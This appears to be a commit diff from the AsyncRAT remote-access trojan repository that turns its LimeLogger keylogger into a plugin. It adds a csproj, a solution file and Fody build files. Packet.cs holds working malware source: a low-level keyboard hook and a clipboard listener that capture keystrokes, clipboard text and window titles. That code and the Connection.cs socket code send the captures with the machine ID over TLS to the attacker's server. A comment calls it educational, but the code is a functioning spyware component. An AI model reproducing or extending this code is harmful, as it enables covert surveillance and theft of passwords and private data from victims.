<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DAFE686A-461B-402B-BBD7-2A2F4C87C773}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>LimeLogger</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

180
AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs → AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs
View File

@ -1,22 +1,94 @@
using System;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
using Client.MessagePack;
using System.Threading;
using Client.Connection;
using System.Windows.Forms;
namespace Client.Handle_Packet
namespace Plugin
{
// │ Author : NYAN CAT
// │ Name : LimeLogger v0.1
// │ Contact : https://github.com/NYAN-x-CAT
public static class Packet
{
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "keyLogger":
{
HandleLimeLogger.isON = false;
break;
}
}
}
// This program is distributed for educational purposes only.
public static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
Connection.Send(msgpack.Encode2Bytes());
}
}
public static class HandleLimeLogger
public class ClipboardNotification : Form
{
public ClipboardNotification()
{
SetParent(Handle, HWND_MESSAGE);
AddClipboardFormatListener(Handle);
}
protected override void WndProc(ref Message m)
{
if (m.Msg == WM_CLIPBOARDUPDATE)
{
Debug.WriteLine($"Clipboard {Clipboard.GetCurrentText()}");
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("log").AsString = $"\n\r[Clipboard]\n{Clipboard.GetCurrentText()}\n\r";
Connection.Send(msgpack.Encode2Bytes());
}
base.WndProc(ref m);
}
private const int WM_CLIPBOARDUPDATE = 0x031D;
private static IntPtr HWND_MESSAGE = new IntPtr(-3);
[DllImport("user32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool AddClipboardFormatListener(IntPtr hwnd);
[DllImport("user32.dll", SetLastError = true)]
private static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent);
}
internal static class Clipboard
{
public static string GetCurrentText()
{
string ReturnValue = string.Empty;
Thread STAThread = new Thread(
delegate ()
{
ReturnValue = System.Windows.Forms.Clipboard.GetText();
});
STAThread.SetApartmentState(ApartmentState.STA);
STAThread.Start();
STAThread.Join();
return ReturnValue;
}
}
public static class HandleLimeLogger
{
public static bool isON = false;
public static void Run()
@ -24,28 +96,38 @@ namespace Client.Handle_Packet
_hookID = SetHook(_proc);
new Thread(() =>
{
while (ClientSocket.IsConnected)
while (Connection.IsConnected)
{
Thread.Sleep(10);
Thread.Sleep(1000);
if (isON == false)
{
break;
}
}
UnhookWindowsHookEx(_hookID);
CurrentActiveWindowTitle = "";
Connection.Disconnected();
GC.Collect();
Application.Exit();
}).Start();
Application.Run();
Application.Run(new ClipboardNotification());
}
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
try
{
return SetWindowsHookEx(WHKEYBOARDLL, proc,
GetModuleHandle(curModule.ModuleName), 0);
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WHKEYBOARDLL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
isON = false;
return IntPtr.Zero;
}
}
@ -56,11 +138,11 @@ namespace Client.Handle_Packet
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
bool capsLock = (GetKeyState(0x14) & 0xffff) != 0;
bool shiftPress = (GetKeyState(0xA0) & 0x8000) != 0 || (GetKeyState(0xA1) & 0x8000) != 0;
bool capsLockPressed = (GetKeyState(0x14) & 0xffff) != 0;
bool shiftPressed = (GetKeyState(0xA0) & 0x8000) != 0 || (GetKeyState(0xA1) & 0x8000) != 0;
string currentKey = KeyboardLayout((uint)vkCode);
if (capsLock || shiftPress)
if (capsLockPressed || shiftPressed)
{
currentKey = currentKey.ToUpper();
}
@ -71,7 +153,6 @@ namespace Client.Handle_Packet
if ((Keys)vkCode >= Keys.F1 && (Keys)vkCode <= Keys.F24)
currentKey = "[" + (Keys)vkCode + "]";
else
{
switch (((Keys)vkCode).ToString())
@ -83,7 +164,7 @@ namespace Client.Handle_Packet
currentKey = "[ENTER]\n";
break;
case "Escape":
currentKey = "";
currentKey = "[ESC]\n";
break;
case "Back":
currentKey = "[Back]";
@ -94,23 +175,24 @@ namespace Client.Handle_Packet
}
}
StringBuilder sb = new StringBuilder();
if (CurrentActiveWindowTitle == GetActiveWindowTitle())
if (!string.IsNullOrEmpty(currentKey))
{
sb.Append(currentKey);
StringBuilder sb = new StringBuilder();
if (CurrentActiveWindowTitle == GetActiveWindowTitle())
{
sb.Append(currentKey);
}
else
{
sb.Append($"\n\r[{DateTime.Now.ToShortTimeString()}] [{GetActiveWindowTitle()}]");
sb.Append($"\n{currentKey}");
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("log").AsString = sb.ToString();
Connection.Send(msgpack.Encode2Bytes());
}
else
{
sb.Append(Environment.NewLine);
sb.Append(Environment.NewLine);
sb.Append($"### {GetActiveWindowTitle()} ###");
sb.Append(Environment.NewLine);
sb.Append(currentKey);
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
msgpack.ForcePathObject("log").AsString = sb.ToString();
ClientSocket.Send(msgpack.Encode2Bytes());
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
@ -140,19 +222,20 @@ namespace Client.Handle_Packet
{
try
{
IntPtr hwnd = GetForegroundWindow();
GetWindowThreadProcessId(hwnd, out uint pid);
Process p = Process.GetProcessById((int)pid);
string title = p.MainWindowTitle;
if (string.IsNullOrWhiteSpace(title))
title = p.ProcessName;
CurrentActiveWindowTitle = title;
return title;
const int nChars = 256;
StringBuilder stringBuilder = new StringBuilder(nChars);
IntPtr handle = GetForegroundWindow();
GetWindowThreadProcessId(handle, out uint pid);
if (GetWindowText(handle, stringBuilder, nChars) > 0)
{
CurrentActiveWindowTitle = stringBuilder.ToString();
return CurrentActiveWindowTitle;
}
}
catch (Exception)
{
return "???";
}
return "???";
}
#region "Hooks & Native Methods"
@ -164,6 +247,8 @@ namespace Client.Handle_Packet
private static string CurrentActiveWindowTitle;
[DllImport("user32.dll")]
private static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
@ -197,4 +282,5 @@ namespace Client.Handle_Packet
#endregion
}
}

33
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs Normal file
View File

@ -0,0 +1,33 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient();
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

36
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("dafe686a-461b-402b-bbd7-2a2f4c87c773")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

5
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

25
AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Miscellaneous", "Miscellaneous\Miscellaneous.csproj", "{37E20BAF-3577-4CD9-BB39-18675854E255}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.Build.0 = Debug|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.ActiveCfg = Release|Any CPU
{37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {25F73428-705F-4933-8D8E-8E3199E87CAB}
EndGlobalSection
EndGlobal

222
AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs Normal file
View File

@ -0,0 +1,222 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient(byte[] packet)
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
Packet.Read(packet);
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

3
AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

Some files were not shown because too many files have changed in this diff Show More